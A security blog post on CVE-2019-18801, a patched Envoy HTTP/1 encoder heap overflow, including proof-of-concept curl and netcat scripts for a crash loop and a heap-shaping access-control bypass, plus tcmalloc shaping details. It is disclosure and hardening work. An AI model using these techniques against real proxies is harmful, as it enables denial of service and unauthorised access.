Exploiting an Envoy heap vulnerability

At Google, we have a commitment to enhancing the security and reliability of the Envoy proxy. We have dedicated initiatives around hardening, fuzzing, and responding to CVEs that are intended to increase our confidence in the trustworthiness of Envoy as a component in our infrastructure stack and those of our customers. In addition, we offer a Vulnerability Reward Program, open to all security researchers who can provide details on security vulnerabilities in Envoy.

Why do we care about making Envoy secure? In addition to being good stewards of OSS projects, we also use Envoy to provide cloud services, like Internal HTTP(S) Load Balancing. For such services, customers depend on Google to uncover and resolve security issues.

This article provides a deep dive into an Envoy vulnerability that was successfully detected and fixed by our Envoy Platform team. The focus is on a single heap vulnerability in Envoy’s HTTP/1 codec which, if exploited, would allow an attacker to bypass Envoy’s access control and routing logic.

Heap vulnerabilities are rare in Envoy as we use modern C++ features such as smart pointers, fuzz the data plane and have high test coverage (97%+ line coverage). We also make use of Clang’s Address Sanitizer, which runs in our CI and during fuzzing. However, even a single heap vulnerability can provide a potent attack vector. We consider one of the contributions of this article to be raising awareness of how heap vulnerabilities can be exploited on an L7 network proxy’s data plane, from first principles and with relatively little sophistication. This complements another recently published heap vulnerability in HAProxy’s HPACK implementation, CVE-2020-11100 from Google’s Project Zero.

The vulnerability we focus on below is CVE-2019-18801, which was fixed in the 1.12.2 Envoy security release in early December 2019. GCP’s Internal HTTP(S) Load Balancing product (which is based on Envoy) was patched prior to the embargo release date. Envoy-derived binaries, e.g. Istio, were patched in tandem with the release. We were alerted to a potential exploit while investigating a report from one of Envoy’s data plane fuzzers running on ClusterFuzz. It required about 2 days of work to turn into a viable proof-of-concept, which included time spent learning about tcmalloc internals, experimenting with heap exploit techniques (e.g. heap shaping, vptr manipulation, etc.), building out tooling and working through the story below.

It’s worth noting that the underlying implementation heap overrun bug would have been fixed even if no demonstrated exploit could have been found. Without the demonstration of exploitability, it would have been a correctness bug with potential security implications, and still worth fixing.

When talking about vulnerabilities, it’s helpful to be aware of the threat model. In this article, we take Envoy’s documented threat model and consider the case of an untrusted downstream client, under the control of an attacker, sending HTTP requests to an Envoy proxy.

A fuzzy beginning

Work on this exploit began when we were notified that ClusterFuzz had filed a new issue, https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=18431. The fuzzer in question was codec_impl_fuzz_test, exercising Envoy’s HTTP/1 and HTTP/2 codecs.

Due to Envoy’s use of ASSERTs to state invariants related to buffer allocations, the potential for an overflow was given in the top-level fuzz report:

Crash Type: ASSERT
Crash Address:
Crash State:
bufferRemainingSize() >= length.
Envoy::Http::Http1::ConnectionImpl::copyToBuffer
Envoy::Http::Http1::RequestStreamEncoderImpl::encodeHeaders

By also examining the corpus provided by the fuzzer, it was evident that there was likely some interaction between the :method field and the Envoy::Http::Http1::ConnectionImpl::copyToBuffer() method in the HTTP/1 encoder.

headers {
key: ":method"
value: "GETactions {\n muta{\n ketruest_he key: ctions {\n ers {\n headers {\n key: ctions {\n new_streamTnrtasfTkey: ctioew: new_stream {asfer-e key: ctioew: r-e… and lots more like this…
}

Code inspection revealed that, in the HTTP/1.1 encode path, a memcpy was occurring into a buffer whose size didn’t depend on the :method header field value length. The code likely assumed that only valid method values would be used, such as GET, POST, HEAD, etc. However, RFC 7231 allows arbitrary request methods, as described in https://tools.ietf.org/html/rfc7231#section-4.
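
To see why an arbitrary-length method breaks that assumption, a back-of-the-envelope check is enough. This is not Envoy’s actual code: the 4096 + path-length reservation figure is discussed later in this article, and the request-line layout here is a simplification.

# A rough check of the overflow condition, assuming the encoder reserves
# 4096 bytes plus the path length and writes "<method> <path> HTTP/1.1\r\n".
def request_line_bytes(method: str, path: str) -> int:
    return len(method) + 1 + len(path) + len(" HTTP/1.1\r\n")

path = "/"
reservation = 4096 + len(path)
for method in ("GET", "A" * 4200):
    needed = request_line_bytes(method, path)
    print(f"{method[:8]:<8} needed={needed} reserved={reservation} "
          f"{'overflow' if needed > reservation else 'fits'}")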

From vulnerability to exploit

The fuzzer crash demonstrated that there was at least some implementation bug. The next step in understanding the vulnerability was to determine whether it was possible to send arbitrary method values on the wire as a remote attacker and have Envoy attempt to encode them as HTTP/1.

Initial conversations with Envoy founder (and data plane expert) Matt Klein revealed that it was unlikely that the HTTP/1 parser would allow arbitrary methods at the decode stage. A simple experimental environment, in which an Envoy binary was pointed at an example bootstrap YAML for proxying to google.com, demonstrated that this was a correct assessment. Writing a request such as:

FooBar / HTTP/1.1
Host: foo

via netcat to the Envoy process and inspecting Envoy logs at trace level revealed that these non-standard methods are rejected immediately by http-parser:

[2019-10-31 00:36:49.162][84055][debug][http] [source/common/http/conn_manager_impl.cc:275] [C2] dispatch error: http/1.1 protocol error: HPE_INVALID_METHOD

However, Envoy can proxy requests from an HTTP/2 client to an HTTP/1 backend. It was less clear whether our HTTP/2 parser, built on nghttp2, would block arbitrary methods. In general, HTTP/2 encourages a more opaque treatment of header values and regularizes treatment of the request method via the :method pseudo-header. It was plausible that the HTTP/2 parser wouldn’t attempt to interpret the contents of this header.

To test this possibility, netcat was not very practical as a starting point, as we would need the ability to craft custom binary frames to send as an HTTP/2 request. curl provides the ability to add arbitrary request methods, so a probe request could be sent with:

curl --http2-prior-knowledge --request FooBar localhost:10000

This was successfully proxied through Envoy to the backend, so it seemed possible to exercise the code in question. The next probe was:

curl --http2-prior-knowledge --request "AAAAAA… around 4200 As … AA" localhost:10000

When this request was applied to a debug Envoy build with ASSERTs enabled, the same crash that was reported by the fuzzer was observed. This was encouraging; now it was clear that a remote attacker with just curl could target any Envoy configured for downstream HTTP/2 and upstream HTTP/1, a fairly standard data plane forwarding behavior. It was clear at this point that the vulnerability might have wide scope and impact.

Query-of-death

An obvious attack from this kind of heap corruption is a query-of-death (QoD). This is the simplest heap exploit to consider, but if it was easily repeatable, it would mean that a remote attacker could bring down an entire edge fleet of Envoys with only 1 query per Envoy. This would lead to a highly asymmetric DoS attack.

After some experimentation, a QoD sequence that typically creates a crash within a few seconds was derived using just curl and some bash:

while true
do
curl -m "$((( RANDOM % 5) + 1 ))" \
--http2-prior-knowledge --request "AAAA… around 48kb As" \
localhost:10000 -d “foo” &
sleep 1
done

What’s going on here? Multiple curl requests are being sent. Each is overflowing a buffer. In this example we used a simple Python backend test server to sink the traffic:

python -m SimpleHTTPServer 1050

We use randomized delays for the curl timeout to generate heap churn. This avoided falling into degenerate deterministic heap allocations, where we kept corrupting the same buffer that was never reused. The above example reproduces within a few requests and would likely have worked against a production service.

Data plane manipulation

Crashing an Envoy fleet via a QoD spray is a good start, but we can potentially do more with a heap overflow vulnerability such as this, by taking advantage of HTTP proxy specifics. Potential exploits include:

  • Corrupting other in-flight requests, for example rewriting contents or headers of some other user’s request.

  • Corrupting source/length of memory copies or buffers to read out arbitrary memory contents, leaking high value data such as crypto keys. By having contents copied into requests an attacker controls, a means of exfiltration on the wire may exist.

  • Remote code exploit (RCE), where complete remote ownership of the process takes place.

The most devastating remote attack is a reliable RCE or a memory read out. RCEs are somewhat trickier on the heap in comparison to the stack. This is because the heap is typically used for data accesses rather than control flow. However, in C++ we have the potential to corrupt vtable pointers, as well as regular function pointers.

RCEs are typically mitigated by ASLR. We started to explore by examining the text segment in /proc/<pid>/smaps, to establish whether ASLR was enabled for Envoy:

00400000-017ee000 r-xp 00000000 fe:01 17961168                           /usr/local/.../bazel-out/k8-opt/bin/source/exe/envoy-static

This didn’t look very random; in fact it’s the link address. OSS Envoy was missing the -fPIE compile option and the Linux kernel can only do ASLR for a position independent executable. This was an oversight and was fixed in https://github.com/envoyproxy/envoy/pull/8792.

A key property of any exploit is it needs to be repeatable, not just a one in a billion possibility. To create a reliable exploit, we don’t want to rely on arbitrary memory contents being overwritten, as we don’t know what the heap looks like in general. Instead, we want the heap to be primed so that when a buffer overflow is triggered, there will be something located at the overflow location that is highly likely to result in an exploit possibility. The idea of priming the heap in this way is generally known as heap shaping (aka heap grooming, heap feng shui, see related heap spraying).

To understand how it’s possible to shape the heap in the Envoy case, a useful starting place is the memory allocator. In Envoy, this is tcmalloc, selected for its performance and profiling capabilities. A key insight that enables simple heap shaping is tcmalloc’s small object allocation algorithm. A number of heap allocation classes exist, grouping allocations into similar size classes. If two allocations of X bytes and ≈X bytes occur, they are likely to land in the same size class. On the hot path, each thread maintains its own free list for each size class. When depleted, the thread asks a global (central) allocator for more objects in this class. When the central allocator is depleted, it requests large contiguous page allocations (referred to as slabs) that are then broken up into the objects of the size class. The free list operates LIFO, so on a quiescent system these facts can be used to arrange the free list and data allocations to create an exploit opportunity.

The first trick is to ensure that all objects, both the encoding buffer for the overflow and the target of the overflow, come from the same size class. This provides the possibility that they will be coresident on the same slab of pages allocated by the central allocator. The encoding buffer is sized at 4kb + path length and comes from a reservation made by Envoy’s Buffer::OwnedImpl. Ultimately, these reservations are backed by Buffer::OwnedSlice and allocated via a custom new. These heap allocations are rounded up to the next page size, so will be 8kb. As a result, we needed the target buffer for the attack to also be 8kb.
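
The size arithmetic above can be made concrete; the 4kb + path length figure is from this paragraph, and the 4kb page size used for the rounding is an assumption for illustration.

# The sizes involved, per the description above: the encode buffer reservation
# is 4 KB plus the path length, and the slice allocation backing it is rounded
# up to a whole number of 4 KB pages, i.e. 8 KB for any non-empty path.
import math

PAGE = 4096
path = "/"
reservation = PAGE + len(path)                       # 4097
slice_alloc = math.ceil(reservation / PAGE) * PAGE   # 8192
print(reservation, slice_alloc)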

How could we create a target buffer of 8kb? There are a few ways to do this:

  1. Have multiple requests, each with allocations that are ≈8kb. We knew we could get this for free in the request encode buffer. By adjusting both start and completion times of requests, it would be possible to shape the ordering of the tcmalloc free lists.

  2. Sending large bodies in the request that are ≈8kb.

  3. We also had prior knowledge that Envoy’s HeaderMapImpl would malloc buffers to fit request header values, so using large headers could also force such allocations.

The next part of the attack was to have the encode buffer precede the target buffer and be within a range that header byte size limits would allow (64kb). To understand memory layout, we sent multiple large requests (with techniques 1–3) populated with ASCII A (0x41) in the method header and ASCII B (0x42) in the data payload, set a breakpoint on the firing ASSERT and inspected memory contents under gdb. This was a form of dye tracing. In addition, we inserted log messages at various sites to track likely large allocations of interest. Visually, it’s easy to page through memory around the target with a command such as:

(gdb) x /5000xw 0x26f0000

And see output like:

0x26f0000: 0x0138b490 0x00000000 0x026f0028 0x00000000
0x26f0010: 0x00000000 0x00000000 0x00000000 0x00000000
0x26f0020: 0x00001fd8 0x00000000 0x41414141 0x41414141
0x26f0030: 0x41414141 0x41414141 0x41414141 0x41414141

0x2701000: 0x0138b490 0x00000000 0x02701028 0x00000000
0x2701010: 0x00000000 0x00000000 0x00000000 0x00000000
0x2701020: 0x00001fd8 0x00000000 0x42424242 0x42424242
0x2701030: 0x42424242 0x42424242 0x42424242 0x42424242

After some fiddling around with ordering, multiplicity and timing, we got lucky. Envoy happened to allocate the header encoding buffer immediately before the slice related to the data payload. This luck was helpful but not necessary; we describe more explicit heap shaping below.

Now that we had a target Buffer::OwnedSlice, tweaking the method header size slightly to force it to overrun the buffer was possible via some iteration. The key to causing a crash here was to consider what the initial bytes of the target buffer look like:

0x2701000: 0x0138b490 0x00000000 0x02701028 0x00000000

There were some interesting targets here that are likely to cause segfaults if corrupted. The first was the C++ object vptr 0x0138b490. Writing 0x42424242 over this would crash control flow. The next was 0x02701028, which, due to a detail of the buffer implementation, provides an indirect pointer to the real buffer contents. This would also crash if corrupted and later accessed.
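
For reference, the first four 32-bit words of that dump can be read as two little-endian 64-bit values, matching the vptr and the indirection pointer called out above (assuming an x86-64 little-endian layout):

# Reading the first words of the dumped slice as two 64-bit pointers:
# the vptr and the indirect pointer into the slice's own storage.
import struct

words = [0x0138b490, 0x00000000, 0x02701028, 0x00000000]   # from the gdb dump
raw = struct.pack("<4I", *words)
vptr, base = struct.unpack("<2Q", raw)
print(hex(vptr), hex(base))   # 0x138b490 0x2701028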

So, we had another repeatable crash vector. The next step was to consider what would happen if we rewrote the vptr in a more deliberate way. This would allow us to change later code execution. What if we rewrote the buffer base to point it at some arbitrary memory location we wanted to read? We might be able to copy ranges of Envoy process memory into our request.

We tweaked the overflow to include changes to pointer locations, using \x escaping in the curl strings. Unfortunately, Envoy started to reject the HTTP/2 client requests prior to them being able to reach the HTTP/1 encoder. This was because the HTTP/2 standard limits header value characters to printable ASCII characters as per RFC constraints on valid header values (https://tools.ietf.org/html/rfc7230#section-3.2.6). Nghttp2 enforces this property.

This limitation significantly reduced the potential for the exploit as developed so far; it was not possible to rewrite pointers in a meaningful way. Back to the drawing board.

Targeting plain memory allocations

Envoy performs C++ object allocations on the heap via new, as well as regular plain mallocs. Plain mallocs don’t have the problem of vptr corruption. Large header values are allocated in dedicated malloc buffers in Envoy. What if it was possible to manipulate the contents of an in-flight header string to achieve some interesting outcome?

We knew from a previous CVE that it is useful for an attacker to make the backend’s interpretation of the :path header differ from the one Envoy uses when performing its authorization checks (ext_authz, RBAC, route table lookup). It can provide a bypass of Envoy’s authorization and access control capabilities, for example. So, we looked at what could be done to the path header. After some experimentation, the following seemed likely to work:

  1. Remote attacker shapes the heap with some preliminary requests.

  2. Remote attacker sends request A with the path set to //.. about 8kb of /…/. The advantage of this pattern is that it is often collapsed to / by backends.

  3. Envoy performs ext_authz, RBAC, routing on request A and then buffers request A. We assume the use of the buffer filter, which is not uncommon.

  4. Remote attacker sends request B with the method header overflow. The encoding buffer for B must precede the path header malloc for A, as a result of the shaping in (1).

  5. Request B modifies the path in A to point to /some_secret_treasure. The remote attacker now bypasses Envoy’s access controls and gains access via request A to protected backend services (the secret treasure).

A more sophisticated attacker might at this point have turned their attention to the tcmalloc heap data structures, or maybe looked for other raw malloc buffers that could be manipulated for RCE or for leaking out crypto keys; this requires some time and creativity, and we already had a likely attack vector, so we moved on to making this exploit reliably reproducible. The key was to manage step (1) above.

Shaping the heap

For any non-crash exploit, we also ideally want the target buffer to still be active after the overflow request encoding occurs. This requires that we pay attention to the timing of requests and be able to have some ability to influence this; at this point curl alone is not the right tool.

There are dedicated packet and request manipulation tools, for example scapy. However, we had some HTTP/2 header encoding utilities from previous CVEs and fuzzers in Envoy, so we opted to use these as the basis for the attacks. We wrote a short utility based on these libraries to generate a file preamble-and-headers.bin providing a connection prefix consisting of:

  • HTTP/2 client connection preface

  • Default SETTINGS frame

  • Initial WINDOW_UPDATE frame

together with a candidate HEADERS frame with the 8kb ///.. path. A second file, data-eos.bin, had a DATA frame with EOS set. Using this pattern, netcat could be used to send, hold and finish a request stream, e.g.:

(cat preamble-and-headers.bin; sleep 2; cat data-eos.bin) | \
nc -N localhost 10000
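
The exact utility isn’t reproduced here, but a rough equivalent of the preamble-and-headers.bin / data-eos.bin generator can be sketched with the Python h2 library; the header values below (path length, authority, window increment) are illustrative assumptions rather than the values actually used.

# A rough stand-in for the preamble/headers generator, using the Python h2
# library; the real utility was based on Envoy's own HTTP/2 encoding helpers.
import h2.config
import h2.connection

config = h2.config.H2Configuration(client_side=True)
conn = h2.connection.H2Connection(config=config)
conn.initiate_connection()                      # client connection preface + SETTINGS
conn.increment_flow_control_window(2 ** 20)     # an initial WINDOW_UPDATE

headers = [
    (":method", "GET"),
    (":path", "/" + "/.." * 2730),              # ~8kb of /../ (placeholder value)
    (":scheme", "http"),
    (":authority", "host"),
]
conn.send_headers(stream_id=1, headers=headers, end_stream=False)

with open("preamble-and-headers.bin", "wb") as f:
    f.write(conn.data_to_send())                # preface, SETTINGS, WINDOW_UPDATE, HEADERS

conn.send_data(stream_id=1, data=b"foo", end_stream=True)
with open("data-eos.bin", "wb") as f:
    f.write(conn.data_to_send())                # just the DATA frame with END_STREAM set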

If we imagine the tcmalloc thread local cache slab for 8KB in question to look like H₀H₁H₂ and free list to be [H₀, H₁, H₂] initially, we want to arrange something like:

  • H₀ = request encode buffer for overflow request B.

  • H₁ = malloc allocation for 8kb ///.. path in target request A.

To shape the heap, we can send an initial shaping request with an 8kb path header, call this request S, and hold it. At this point, the free list looks like [H₁, H₂].

We then send request A and hold it. The free list looks like [H₂] and we have H₀ containing request S’s path header and H₁ containing request A’s path header.

We now send “end stream” for request S, resulting in a free list of [H₀, H₂].

We then send request B, which will have its request header allocated at H₀, immediately below request A’s path header. This is deterministic on a quiescent Envoy. It’s necessary to set --concurrency 1 to increase the odds of it working reliably. More sophisticated shaping could probably make this work with higher probability on loaded or multi-worker servers.
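
The sequence above can be sanity-checked with a few lines that model the per-thread LIFO free list; the H₀..H₂ labels and the allocation/free order are taken from the description above, and everything else is a simplification.

# A minimal model of the per-thread LIFO free list for the 8 KB size class,
# walking through the S / A / B sequence described above.
free_list = ["H0", "H1", "H2"]
owner = {}

def alloc(tag):
    block = free_list.pop(0)              # allocations take from the head
    owner[tag] = block
    return block

def release(tag):
    free_list.insert(0, owner.pop(tag))   # freed blocks go back to the head (LIFO)

alloc("S path header")    # -> H0, free list is now [H1, H2]
alloc("A path header")    # -> H1, free list is now [H2]
release("S path header")  # free list is now [H0, H2]
b = alloc("B encode buffer")
print(b)                  # H0: immediately below request A's path header in H1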

At this point, we have the techniques to deterministically overwrite the path of one request with contents in the method header of another request. The next step was to generate a proof-of-concept. We configured Envoy with the following HCM bootstrap:

- name: envoy.http_connection_manager
  typed_config:
    "@type": type.googleapis.com/envoy.config.filter.network.http_connection_manager.v2.HttpConnectionManager
    codec_type: HTTP2
    stat_prefix: ingress_http
    route_config:
      name: local_route
      virtual_hosts:
      - name: local_service
        domains: ["*"]
        routes:
        - match:
            prefix: "/treasure"
            headers:
            - name: ":method"
              exact_match: "GET"
          direct_response:
            status: 503
        - match:
            prefix: "/"
          route:
            cluster: service_google
    http_filters:
    - name: envoy.buffer
      config:
        max_request_bytes: 128000
    - name: envoy.router

The /treasure path was supposed to be sinkholed. The use of GET header matching here is due to a technicality that becomes apparent when we expand what the backend sees below.

The attack script was then:

# Request S
(cat preamble-and-headers.bin; sleep 2; cat data-eos.bin) | \
nc -N localhost 10000 &
sleep 0.5
# Request A
(cat preamble-and-headers.bin; sleep 10; cat data-eos.bin) | \
nc localhost 10000 > result_containing_the_secret_treasure &
sleep 3
# Request B
curl --http2-prior-knowledge \
--request "AA.. about 8kb of A.. AA" \
localhost:10000/treasure -d “foo”

This roughly follows the logic described above, but there is one trick: the request for the treasure is in the path, not the method overflow… why?

When we first attempted to overflow the buffer, and placed /treasure in the method header overflow, a strange request was delivered:

GET /treasure / HTTP/1.1
host: localhost:10000
user-agent: curl/7.64.0
accept: */*
content-length: 3
content-type: application/x-www-form-urlencoded
x-forwarded-proto: http
x-request-id: 79a313a6-996d-4266-bf8f-646205d24ac9
x-envoy-expected-rq-timeout-ms: 15000
.../ HTTP/1.1
host: host
foo: bCCCCC
x-forwarded-proto: http
x-request-id: be710b85-8c80-46be-92cb-895191299638
content-length: 4
x-envoy-expected-rq-timeout-ms: 15000

There are two path specifiers in the first line of the request (illegal) and what looks to be two nested requests. Envoy’s HTTP/1 request encoder appended the buffer in request B, overflowed into request A, but then also continued to finalize the headers for request B inside request A’s path header value. We needed a slightly different strategy to make the exploit work given this behavior:

curl --http2-prior-knowledge \
--request "AA.. about 8kb of A.. AA" \
localhost:10000/treasure -d “foo”

We tweaked the overflow bytes in request B to position request B’s encoder such that once it had written its method inside its own buffer, the remainder of request B, starting with the /treasure path, became the new path for request A. Due to the newline breaking request A’s path, we end up with request A’s header encoding treated as request A’s HTTP body. The backend then observed:

GET /treasure HTTP/1.1
host: localhost:10000
user-agent: curl/7.64.0
accept: */*
content-length: 3
content-type: application/x-www-form-urlencoded
x-forwarded-proto: http
x-request-id: 95028bfb-7890-4f6a-a96f-1b43a48716c6
x-envoy-expected-rq-timeout-ms: 15000
.../ HTTP/1.1
host: host
foo: bCCCCC
x-forwarded-proto: http
x-request-id: 04964d4c-19a7-41bb-8a90-d2dedbe9755b
content-length: 4
x-envoy-expected-rq-timeout-ms: 15000

We constructed a simple backend Flask Python server to be able to control timing and return the treasure. After running the above script, result_containing_the_secret_treasure has the desired treasure returned to the attacker.
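
The backend itself isn’t included here; a minimal Flask sketch along these lines (route names, port, methods and delay are assumptions) would be enough to hold request A open and serve the treasure.

# A minimal sketch of a backend for the proof-of-concept: an ordinary route
# that sleeps to hold request A open, plus the protected /treasure route.
import time
from flask import Flask

app = Flask(__name__)

@app.route("/treasure", methods=["GET", "POST"])
def treasure():
    return "the secret treasure\n"

@app.route("/", defaults={"rest": ""}, methods=["GET", "POST"])
@app.route("/<path:rest>", methods=["GET", "POST"])
def sink(rest):
    time.sleep(5)        # hold request A open while request B is sent
    return "ok\n"

if __name__ == "__main__":
    app.run(port=1050)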

Practical implications

At this point, given the careful timing and configuration choice, it’s reasonable to question the practical application of this exploit. Here we enumerate and examine some assumptions and considerations:

  • A HTTP/2 → HTTP/1 request path is a reasonably common Envoy data plane forwarding path.

  • The buffer filter is one of Envoy’s core filters that features in many configurations.

  • Assuming a quiescent server is a little more restrictive. However, regional servers and proxies may be quiescent at night. Also, it’s only necessary to access the hidden treasure once to have a successful attack. More sophisticated heap shaping would reduce the need for this restriction. Timing requirements may also depend on the nature of the shaping; in our example they were fairly generous and easy to implement with the sleep command at second granularity.

  • Envoy was run with --concurrency 1 to have all the requests land on the same worker thread. The attack may still work with other concurrency settings with some lower probability.

  • The GET header matching was needed due to the use of /treasure in request B. We needed to avoid the rejection of request B prior to forwarding and invoking the HTTP/1 encoder. This configuration choice is unusual, but there are other highly plausible scenarios in which we wouldn’t need to do this. For example, if there were two listeners with different route configurations, where one sinkholed /treasure and the other didn’t, the GET header matching would not be required.

  • After the attack, the Envoy process had a corrupted memory allocator state. We couldn’t access the treasure again on a second replay with the same server. This increased the likelihood of detection (e.g. via core dump and analysis) and reduced the likelihood of the attack working on a noisier server.

This attack was built from first principles and ignores a large body of work and tooling around RCE and heap attacks, since our focus was on the HTTP data plane specific aspects. It’s entirely possible that more sophisticated heap exploits for the same vulnerability, with fewer constraints and assumptions, could be developed by security researchers who specialize in these kinds of attacks. The QoD attack and cross-request interference were also potentially impactful, regardless of either RCE or access control bypass.

For the purposes of Envoy security, we were convinced by the proof-of-concept that we had a critical security vulnerability and scored this as CVSS 9.0. We engaged Envoy’s security release process and worked with the Envoy OSS security team (which we overlap with in membership) to deliver the 1.12.2 security release with the fix for this bug. The fuzzer bug was reported on October 22 and the security release followed on December 10, 2019.

Hardening Envoy’s data plane

Following the security release, we conducted an audit of other uses of memcpy and C string functions across the Envoy code base, removing most of these and validating the remainder. This vulnerability existed because of the use of manual buffer memory management, which is highly discouraged in the code base; most of Envoy works with safe C++ abstractions.

The HTTP/1 request encoder now uses Envoy’s standard buffer abstraction rather than its own internal memory management and pointer arithmetic.

Envoy now builds by default as a position independent executable. Any distribution with ASLR enabled will benefit from this.

We have also opened issues to consider further hardening:

  • Building with the Scudo allocator for Envoys that operate in untrusted environments. The checksum features in Scudo would mitigate against simple overrun attacks. See https://github.com/envoyproxy/envoy/issues/9365.

  • Where there is a tradeoff between performance and security, providing a secure build and runtime profile is desirable. For example, it would be possible to enable runtime bounds checks on STL containers in a secure build mode. This is tracked in https://github.com/envoyproxy/envoy/issues/9087.

  • We have an open issue to eliminate the remaining uses of memcpy, see https://github.com/envoyproxy/envoy/issues/9328.

Heap vulnerabilities exploitable from untrusted client traffic are rare but potentially highly impactful. These black swans need to be taken seriously by those who develop and operate any networking infrastructure implemented in languages where memory safety is not guaranteed. This article has provided a case study in how Google’s Envoy Platform team went about discovering and mitigating the only demonstrated remote exploit of this variety to date in the Envoy proxy. We look forward to continuing to harden Envoy to structurally prevent this class of vulnerabilities.

Acknowledgements: Original triage and investigation for the CVE was supported by Matt Klein, the Google Envoy Platform team and Google ISE team. The ClusterFuzz infrastructure helped discover the ASSERT violation and generated the initial fuzz report (built on OSS-Fuzz). Thanks to the reviewers of drafts of this document who contributed a number of improvements, including Joshua Marantz, Stewart Reichling, Felix Gröbert, Christoph Kern and Joshua Blatt. Yan Avlasov led the Envoy OSS fix efforts for CVE-2019-18801, resulting in the Envoy 1.12.2 release. Dan Noé contributed a number of low-level C function cleanups to Envoy in the wake of the security release.

Disclaimer: The opinions stated here are my own, not those of my company (Google).

Originally published at: https://blog.envoyproxy.io/exploiting-an-envoy-heap-vulnerability-96173d41792
